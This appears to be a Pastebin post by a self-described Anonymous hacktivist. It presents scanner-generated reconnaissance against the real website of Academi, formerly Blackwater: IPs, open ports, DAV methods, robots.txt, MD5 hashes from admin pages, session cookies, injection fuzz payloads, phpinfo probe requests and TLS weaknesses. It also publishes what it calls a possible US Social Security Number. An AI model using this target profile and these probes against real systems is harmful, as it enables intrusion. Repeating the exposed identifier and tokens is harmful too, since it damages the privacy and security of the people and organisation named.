Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- EXPLOITATION & VULNERABILITY OF ACADEMI/ ALSO KNOW AS BLACKWATER (RAMBO'S). BY ANON-NINJA-CAT , CONTACT INFOSEC-CAT THROUGHT ENCRYPTED CODE ,WHO WILL CONTACT CONE-CAT FOR CLEARANCE TO THE CYBER-HIVE . /MILD EXPLOITATION REPORT/
- WE ARE ANONYMOUS
- WE ARE LEGION
- WE ARE GHOSTS OF THE CYBER-HIVE.
- https://www.academi.com/
- Academi is an American private military company, founded in 1997 by Erik Prince. Formerly known as Blackwater, the company was renamed Xe Services in 2009, and "Academi" in 2011.
- IP Address 54.243.51.249
- Server Type nginx
- Server:nginx
- IP Address:54.243.51.249
- Port:443
- Hostname:www.academi.com
- The target site *has* a DNS wildcard configuration
- The contents of https://54.243.51.249 differ from the contents of https://www.academi.com
- The URL "https://www.academi.com/" has the following allowed methods, which include DAV methods: ACL, BASELINE_CONTROL, CHECKIN, CHECKOUT, CONNECT, COPY, DEBUG, GET, HEAD, INDEX, INVALID, INVOKE, LABEL, LINK, LOCK, MERGE, MKACTIVITY, MKCOL, MKDIR, MKWORKSPACE, MOVE, NOTIFY, OPTIONS, PATCH, PIN, POLL, POST, PROPFIND, PROPPATCH, REPLY, REPORT, RMDIR, SEARCH, SHOWMETHOD, SPACEJUMP, SUBSCRIBE, SUBSCRIPTIONS, TEXTSEARCH, TRACK, UNCHECKOUT, UNLINK, UNLOCK, UNSUBSCRIBE, VERSION_CONTROL.
- The mail account: "feedback@academi.com" was found in:
- - https://www.academi.com/
- Name Servers ip location
- ns1.dnsbycomodo.net 8.20.241.1 usa
- ns2.dnsbycomodo.net 8.20.243.1 usa
- mail.academi.com A 1 hour 67.238.84.240 (Biglerville, PA, US)
- www.academi.com A 1 hour 54.243.51.249 (US)
- Hostname:*.academi.com
- Organization:ACADEMI LLC
- Locality:Moyock
- State:North Carolina
- Country:US
- report for ec2-54-243-51-249.compute-1.amazonaws.com (54.243.51.249)
- Host is up (0.063s latency).
- PORT STATE SERVICE
- 21/tcp filtered ftp
- 22/tcp open ssh
- 80/tcp open http
- 443/tcp open https
- report for amazonaws.com (72.21.206.80)
- Host is up (0.0060s latency).
- Other addresses for amazonaws.com (not scanned): 72.21.210.29 207.171.166.22
- rDNS record for 72.21.206.80: 206-80.amazon.com
- PORT STATE SERVICE
- 80/tcp open http
- ---------------------------------------------------------------------------------------------------------------------------------
- # See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
- #
- # To ban all spiders from the entire site uncomment the next two lines:
- # User-Agent: *
- # Disallow: /
- User-agent: *
- Disallow: /checkout
- Disallow: /cart
- Disallow: /orders
- Disallow: /countries
- Disallow: /line_items
- Disallow: /password_resets
- Disallow: /states
- Disallow: /user_sessions
- Disallow: /user_registrations
- Disallow: /users
- Disallow: /account
- ------------------------------------------------------------------------------------------------------------------------------------
- EXPLOITS:
- The URL: "https://www.academi.com/admin.php" returned a response that may contain a "MD5" hash. The hash is: "5c16451fd9ead8323c89fc4c1f23aebb".
- The URL: "https://www.academi.com/" possibly discloses a US Social Security Number: "261-52-8395
- The URL: "https://www.academi.com/" sent the cookie: "_academi_session=RE45aUppcVhQYW9GSHVpSHpvVTNteXZzN1FpekNQa09jaDc1T05QL3pZSHhrYVRCYytyR1FhTi9PaUlxZWZEL01iM0t6bWtnZUE5U0pKSW1iU1RBNVVlNkFXdUxqZnV2dVVkcElQc0M2elJMZXdCNTBBQlZMT3dWd1RXYm5ESlNBWkw5TGZYZks1cVZtLzdXeHpDbkY0SURVTzlCR2NGMVNET1d4eEFPYyszT3g1NHkxY0tUL0JEN0dJMXFnTWtLLS13bDVQV0xJN0hTYWI2VTRyclhLS0dnPT0%3D--897595f414a1d8dc7b914ba7786eeaa19d06c434; path=/; HttpOnly". This information was found in the request with id 1.
- The URL: "https://www.academi.com/" returned a response that may contain a "MD5" hash. The hash is: "5a3ea22574d3f96af589ebfd32cbc880
- The URL: "https://www.academi.com/" returned a response that may contain a "MD5" hash. The hash is: "d0ff998a8f8b02c25f6b4d199a446596
- The URL: "https://www.academi.com/" returned a response that may contain a "MD5" hash. The hash is: "403130d0ccfc849775ac6b6c1fbd8e0f
- The URL: "https://www.academi.com/" returned a response that may contain a "MD5" hash. The hash is: "493d6c3c2770d886b6c43b2c412c2b01
- The URL: "https://www.academi.com/" returned a response that may contain a "MD5" hash. The hash is: "fd0e05aa9954598ad66ea4c12f697715
- The URL: "https://www.academi.com/" returned a response that may contain a "MD5" hash. The hash is: "e793d662ba44243d0b29e66f9b9e1b66
- The URL: "https://www.academi.com/" returned a response that may contain a "MD5" hash. The hash is: "3d1232cd21812ded98fbf1e7d78a12e1".
- The URL: "https://www.academi.com/" returned a response that may contain a "MD5" hash. The hash is: "2ecf8863467623131e841a5a2a678dc2
- The URL: "https://www.academi.com/" returned a response that may contain a "MD5" hash. The hash is: "7507cb104a2fe68224f25465e2038cbb".
- The URL: "https://www.academi.com/" returned a response that may contain a "MD5" hash. The hash is: "bf9e6d98af0d29a751f5eb6801940f95
- The URL: "https://www.academi.com/" returned a response that may contain a "MD5" hash. The hash is: "9bede45fa0e99f768d1c78e42cd6aa12"
- The URL: "https://www.academi.com/" returned a response that may contain a "MD5" hash. The hash is: "d7d10eadf5ebf82902332553b7a398a9
- The URL: "https://www.academi.com/" returned a response that may contain a "MD5" hash. The hash is: "6a6b20b099d8dd48704e9fde64d166cc
- The URL: "https://www.academi.com/" returned a response that may contain a "MD5" hash. The hash is: "a9aefa4c5ba416e8c2b06d042ee2673d
- The URL: "https://www.academi.com/" returned a response that may contain a "MD5" hash. The hash is: "41f9be3be29b4ea1b830fdc61ee0d0f6"
- The URL: "https://www.academi.com/" returned a response that may contain a "MD5" hash. The hash is: "b3330d615ef9176cb23283c2b46ab4cf"
- An unidentified vulnerability was found at: "https://www.academi.com/", using HTTP method GET. The sent data was: "mode=d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29"
- GET https://www.academi.com/?mode=phpinfo HTTP/1.1
- Host: www.academi.com
- Cookie: _academi_session=NlpxM09DYWR2akxEL09tS3VJams5NytqZ3l6M3I3RjBmVzhCcTd3dnhNelJuaUVaWlFGdmFIYXp0QmZwcUJ0KzZZcjhZL28vTGVhSDlxQXFFS3lYM1N4alhpbnNFWW5FVDRVakxBYzdYTC9Tc25UcS9EdEQ3RDBHRnVNTm5pOS96ZVJXTWJuSXVrNXllUGlvTnRraFZmR1cyRTJUZks1a2xxcWMzZzc4UmVqc1l6SGJ2bjlSUjZuVDdyNHdCaytBLS1MRGw2cW1SR3dzckhwRGNURE8reFFnPT0%3D--4e8872122a34a7f33ff3a632095285d7b042033f;
- An unidentified vulnerability was found at: "https://www.academi.com/admin.php", using HTTP method GET. The sent data was: "mode=d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29
- GET https://www.academi.com/admin/login HTTP/1.1
- Host: www.academi.com
- Cookie: _academi_session=THhUckh5NDdOc0t1T3ViYWZMc0pjazI1WDlxT29uSmY4dDFXSWUwL0lSRXBEZVBpT0dxWCtOTHZ5R0pOVFlxOTgyQTM2TkxyWXpVbjJSVW5kS1BmdEZKeFBNSGxXeWtzWFFvOFdtdUZReERsNVM5TDhpTDlPUUNQOTdzK3ZHYmk4ZFJGVm9PTCtKbUFBcE1EcDNVNmhCVUhUbEdWazRTSFNmZXZFdnEycFF3TldpTE5uZko0SkhSWkpjTGZQMHBLLS16ZVBJaFJ6MUR5K2JyQlNNRXk4VVNBPT0%3D--44a81cba5181ca0d9b39101ed7f9a330dce6f62c;
- An unidentified vulnerability was found at: "https://www.academi.com/", using HTTP method GET. The sent data was: "view=d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29"
- GET https://www.academi.com/?view=phpinfo HTTP/1.1
- Host: www.academi.com
- Cookie: _academi_session=S202YW9BTTBEWmtyOWpWVm1YTzIwc3VBa0M2UE9vM3FjemdRVUs3bkRhaStDSHpYWGFra0QvWGNyUTM3ZFpQTjZ4TXcvUkdSb0lLT0xsWXdEcU1waEtDUDZFLzBZZnZvai93RnpnSkJGSWxvZkNDRVhZbUJ1UnVJREdqaFpRa0RnVG5YQ01HTjBBdEl3VkxYTXdjT0NSWTRDS09yT0JXbW9iN1RiVDY3d0NCU3VYMW5xNHVmdks3MXEvRWhuQkRrLS02dU5ZblZGOW1PQlRybmhRazFzSTFBPT0%3D--7d4fbd67edc6c386ca4a9757d4c500668f4970d5;
- TLS v1.1 and TLS v1.2 should be enabled
- Server should enable more recent versions of TLS protocol
- Server does not have session resumption enabled
- Users may experience slower performance
- Server has not enabled HTTP Strict-Transport-Security
- Users may be exposed to man-in-the-middle attacks
- Server is mixing http and https content
- Attackers may be able to manipulate the page.
- Server uses RC4 cipher with modern browsers
- More secure ciphers are available for TLS 1.1 and newe
- Server configuration does not meet FIPS guidelines
- Federal standards for data handling are not being met
- SSL 2.0 Disabled:Pass
- SSL 3.0 Disabled:Pass
- TLS 1.0 Enabled:Pass
- TLS 1.1 Enabled:Fail <<<<<
- TLS 1.2 Enabled:Fail <<<<<
- Weak ciphersuites disabled:Pass
- Certificates configured correctly:Pass
- Secure renegotiation configured:Pass
- Session resumption configured:Fail <<<<<
- BEAST Vulnerability:Pass
- OCSP Stapling:Fail <<<<<
- PCI Compliant:Pass
- FIPS Compliant:Fail <<<<<
- Forward Secrecy Supported:Pass
- Heartbleed Vulnerability:Pass
- Strict Transport Security:Fail <<<<<
- Mixed Content (HTTP and HTTPS):Fail <<<<<<
- Domain name resolves to IPv4 address:Pass
- Domain name resolves to IPv6 address:Fail <<<<<
- ===================================================================================================================================
- http://www.academiproshop.com (67.132.195.12)
- 80/tcp open http
- [ .NET Configuration Analysis ]
- Server -> Microsoft-IIS/6.0
- AppTrace -> LocalOnly
- Application -> /
- ADNVersion -> 2.0.50727.5710
- Found -> /aspnet_client/system_web/2_0_50727 <<<<<<<<
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement